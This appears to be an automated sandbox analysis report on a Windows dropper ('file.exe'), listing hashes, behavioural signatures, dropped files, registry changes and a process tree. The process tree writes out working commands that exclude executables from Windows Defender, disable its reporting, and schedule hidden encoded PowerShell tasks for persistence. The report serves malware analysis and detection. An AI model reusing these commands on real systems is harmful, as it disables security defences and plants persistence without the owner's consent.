Analysis
-
max time kernel
151s -
max time network
182s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
24-09-2022 13:29
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220812-en
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
046259ce63932f27c7bf22aeec796c2f
-
SHA1
cf80d5bdaa2a0a2fa2414375353f8a180ee43b94
-
SHA256
81a9eb6e5b3b3c239a9cbcccc7d9651d5930aecd0c630e4f36ec6b1d3f4e8cd8
-
SHA512
03949b25835fbdd98cfff9217d937f0695c9bd89c5d13033f5529f015837aee17de8af20af1e1d5407c624ddc77502f19e6613d60eb65da0966d443974b25dc3
-
SSDEEP
196608:91OnECWBY37gkHNIrEDXiA7WAnkAvoc9gVYTVhXsBqmZ+kp6MH+3OBd:3OnECWB87gktIrED+G/oogGhuBqA4Md
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
rundll32.exeflow pid process 60 2936 rundll32.exe 61 2936 rundll32.exe -
Executes dropped EXE 4 IoCs
Processes:
Install.exeInstall.exeLTyeqJn.exejEdXIro.exepid process 460 Install.exe 2888 Install.exe 2280 LTyeqJn.exe 3660 jEdXIro.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Install.exerundll32.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Install.exejEdXIro.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation jEdXIro.exe -
Loads dropped DLL 1 IoCs
Processes:
rundll32.exepid process 2936 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 3 IoCs
Processes:
jEdXIro.exedescription ioc process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\meejmcfbiapijdfaadackoblffmidlig\1.0.0.0\manifest.json jEdXIro.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\goiejopegncpjmocklmfiipofdbkhpic\1.0.0.0\manifest.json jEdXIro.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json jEdXIro.exe -
Drops desktop.ini file(s) 1 IoCs
Processes:
jEdXIro.exedescription ioc process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini jEdXIro.exe -
Drops file in System32 directory 31 IoCs
Processes:
jEdXIro.exeInstall.exeLTyeqJn.exepowershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_57084D1D86D9F07AD164FDFDC2CB1CB3 jEdXIro.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 jEdXIro.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA jEdXIro.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA jEdXIro.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData jEdXIro.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_D29849B2B3CC9118078AA61A670027D9 jEdXIro.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_58589533BD741CABD9C6A1C2A7AAD4A1 jEdXIro.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content jEdXIro.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\48F3BB146086CEF37D471FBE460215C9 jEdXIro.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol jEdXIro.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol LTyeqJn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 jEdXIro.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache jEdXIro.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\48F3BB146086CEF37D471FBE460215C9 jEdXIro.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA jEdXIro.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_57084D1D86D9F07AD164FDFDC2CB1CB3 jEdXIro.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft jEdXIro.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies jEdXIro.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 jEdXIro.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_D29849B2B3CC9118078AA61A670027D9 jEdXIro.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_58589533BD741CABD9C6A1C2A7AAD4A1 jEdXIro.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE jEdXIro.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 jEdXIro.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 jEdXIro.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini LTyeqJn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 jEdXIro.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA jEdXIro.exe -
Drops file in Program Files directory 14 IoCs
Processes:
jEdXIro.exedescription ioc process File created C:\Program Files (x86)\SHsJRQZsU\uUBGhOq.xml jEdXIro.exe File created C:\Program Files (x86)\ATZmuaBwNwmU2\IpnpJPeWMzuTu.dll jEdXIro.exe File created C:\Program Files (x86)\ATZmuaBwNwmU2\vOVJfVJ.xml jEdXIro.exe File created C:\Program Files (x86)\obbvPdCxLMZjlJoeoAR\FlnmNKo.xml jEdXIro.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi jEdXIro.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak jEdXIro.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak jEdXIro.exe File created C:\Program Files (x86)\QYiUKrukFVUn\zUYAOGF.dll jEdXIro.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi jEdXIro.exe File created C:\Program Files (x86)\obbvPdCxLMZjlJoeoAR\vsnVUiF.dll jEdXIro.exe File created C:\Program Files (x86)\aJAQLsoDkiWqC\TqhVnbn.dll jEdXIro.exe File created C:\Program Files (x86)\SHsJRQZsU\ppPWzT.dll jEdXIro.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja jEdXIro.exe File created C:\Program Files (x86)\aJAQLsoDkiWqC\FGzrdXx.xml jEdXIro.exe -
Drops file in Windows directory 4 IoCs
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exedescription ioc process File created C:\Windows\Tasks\bNHXguvSZYiOwSiXLC.job schtasks.exe File created C:\Windows\Tasks\VgOpnHVQDAdMZqNFB.job schtasks.exe File created C:\Windows\Tasks\DNDvMcbpefrYjKZ.job schtasks.exe File created C:\Windows\Tasks\mDNVJgqIdbaAfzWWp.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 3472 schtasks.exe 3984 schtasks.exe 1276 schtasks.exe 4996 schtasks.exe 4488 schtasks.exe 4088 schtasks.exe 3152 schtasks.exe 3948 schtasks.exe 1420 schtasks.exe 4740 schtasks.exe 5012 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
Install.exerundll32.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exepowershell.exejEdXIro.exerundll32.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "3" jEdXIro.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer jEdXIro.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{06969d78-0000-0000-0000-d01200000000}\MaxCapacity = "15140" jEdXIro.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume jEdXIro.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" jEdXIro.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" jEdXIro.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" jEdXIro.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" jEdXIro.exe -
Suspicious behavior: EnumeratesProcesses 40 IoCs
Processes:
powershell.EXEpowershell.exepowershell.exepowershell.EXEjEdXIro.exepid process 808 powershell.EXE 808 powershell.EXE 1600 powershell.exe 1600 powershell.exe 1028 powershell.exe 1028 powershell.exe 4220 powershell.EXE 4220 powershell.EXE 3660 jEdXIro.exe 3660 jEdXIro.exe 3660 jEdXIro.exe 3660 jEdXIro.exe 3660 jEdXIro.exe 3660 jEdXIro.exe 3660 jEdXIro.exe 3660 jEdXIro.exe 3660 jEdXIro.exe 3660 jEdXIro.exe 3660 jEdXIro.exe 3660 jEdXIro.exe 3660 jEdXIro.exe 3660 jEdXIro.exe 3660 jEdXIro.exe 3660 jEdXIro.exe 3660 jEdXIro.exe 3660 jEdXIro.exe 3660 jEdXIro.exe 3660 jEdXIro.exe 3660 jEdXIro.exe 3660 jEdXIro.exe 3660 jEdXIro.exe 3660 jEdXIro.exe 3660 jEdXIro.exe 3660 jEdXIro.exe 3660 jEdXIro.exe 3660 jEdXIro.exe 3660 jEdXIro.exe 3660 jEdXIro.exe 3660 jEdXIro.exe 3660 jEdXIro.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.EXEpowershell.exepowershell.exepowershell.EXEdescription pid process Token: SeDebugPrivilege 808 powershell.EXE Token: SeDebugPrivilege 1600 powershell.exe Token: SeDebugPrivilege 1028 powershell.exe Token: SeDebugPrivilege 4220 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
file.exeInstall.exeInstall.exeforfiles.execmd.exeforfiles.execmd.exepowershell.EXELTyeqJn.exepowershell.execmd.exedescription pid process target process PID 2700 wrote to memory of 460 2700 file.exe Install.exe PID 2700 wrote to memory of 460 2700 file.exe Install.exe PID 2700 wrote to memory of 460 2700 file.exe Install.exe PID 460 wrote to memory of 2888 460 Install.exe Install.exe PID 460 wrote to memory of 2888 460 Install.exe Install.exe PID 460 wrote to memory of 2888 460 Install.exe Install.exe PID 2888 wrote to memory of 3172 2888 Install.exe forfiles.exe PID 2888 wrote to memory of 3172 2888 Install.exe forfiles.exe PID 2888 wrote to memory of 3172 2888 Install.exe forfiles.exe PID 2888 wrote to memory of 3424 2888 Install.exe forfiles.exe PID 2888 wrote to memory of 3424 2888 Install.exe forfiles.exe PID 2888 wrote to memory of 3424 2888 Install.exe forfiles.exe PID 3172 wrote to memory of 1116 3172 forfiles.exe cmd.exe PID 3172 wrote to memory of 1116 3172 forfiles.exe cmd.exe PID 3172 wrote to memory of 1116 3172 forfiles.exe cmd.exe PID 1116 wrote to memory of 2224 1116 cmd.exe reg.exe PID 1116 wrote to memory of 2224 1116 cmd.exe reg.exe PID 1116 wrote to memory of 2224 1116 cmd.exe reg.exe PID 3424 wrote to memory of 2132 3424 forfiles.exe cmd.exe PID 3424 wrote to memory of 2132 3424 forfiles.exe cmd.exe PID 3424 wrote to memory of 2132 3424 forfiles.exe cmd.exe PID 2132 wrote to memory of 2108 2132 cmd.exe reg.exe PID 2132 wrote to memory of 2108 2132 cmd.exe reg.exe PID 2132 wrote to memory of 2108 2132 cmd.exe reg.exe PID 1116 wrote to memory of 4372 1116 cmd.exe reg.exe PID 1116 wrote to memory of 4372 1116 cmd.exe reg.exe PID 1116 wrote to memory of 4372 1116 cmd.exe reg.exe PID 2132 wrote to memory of 4916 2132 cmd.exe reg.exe PID 2132 wrote to memory of 4916 2132 cmd.exe reg.exe PID 2132 wrote to memory of 4916 2132 cmd.exe reg.exe PID 2888 wrote to memory of 4488 2888 Install.exe schtasks.exe PID 2888 wrote to memory of 4488 2888 Install.exe schtasks.exe PID 2888 wrote to memory of 4488 2888 Install.exe schtasks.exe PID 2888 wrote to memory of 3772 2888 Install.exe schtasks.exe PID 2888 wrote to memory of 3772 2888 Install.exe schtasks.exe PID 2888 wrote to memory of 3772 2888 Install.exe schtasks.exe PID 808 wrote to memory of 3524 808 powershell.EXE gpupdate.exe PID 808 wrote to memory of 3524 808 powershell.EXE gpupdate.exe PID 2888 wrote to memory of 2148 2888 Install.exe schtasks.exe PID 2888 wrote to memory of 2148 2888 Install.exe schtasks.exe PID 2888 wrote to memory of 2148 2888 Install.exe schtasks.exe PID 2888 wrote to memory of 5012 2888 Install.exe schtasks.exe PID 2888 wrote to memory of 5012 2888 Install.exe schtasks.exe PID 2888 wrote to memory of 5012 2888 Install.exe schtasks.exe PID 2280 wrote to memory of 1600 2280 LTyeqJn.exe powershell.exe PID 2280 wrote to memory of 1600 2280 LTyeqJn.exe powershell.exe PID 2280 wrote to memory of 1600 2280 LTyeqJn.exe powershell.exe PID 1600 wrote to memory of 1808 1600 powershell.exe cmd.exe PID 1600 wrote to memory of 1808 1600 powershell.exe cmd.exe PID 1600 wrote to memory of 1808 1600 powershell.exe cmd.exe PID 1808 wrote to memory of 836 1808 cmd.exe reg.exe PID 1808 wrote to memory of 836 1808 cmd.exe reg.exe PID 1808 wrote to memory of 836 1808 cmd.exe reg.exe PID 1600 wrote to memory of 388 1600 powershell.exe reg.exe PID 1600 wrote to memory of 388 1600 powershell.exe reg.exe PID 1600 wrote to memory of 388 1600 powershell.exe reg.exe PID 1600 wrote to memory of 1316 1600 powershell.exe reg.exe PID 1600 wrote to memory of 1316 1600 powershell.exe reg.exe PID 1600 wrote to memory of 1316 1600 powershell.exe reg.exe PID 1600 wrote to memory of 4208 1600 powershell.exe reg.exe PID 1600 wrote to memory of 4208 1600 powershell.exe reg.exe PID 1600 wrote to memory of 4208 1600 powershell.exe reg.exe PID 1600 wrote to memory of 640 1600 powershell.exe reg.exe PID 1600 wrote to memory of 640 1600 powershell.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS7FF.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSEB5.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gVnBuvbVF" /SC once /ST 08:04:38 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gVnBuvbVF"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gVnBuvbVF"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bNHXguvSZYiOwSiXLC" /SC once /ST 15:31:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt\QEJzPCsOgNeEaNF\LTyeqJn.exe\" 3x /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
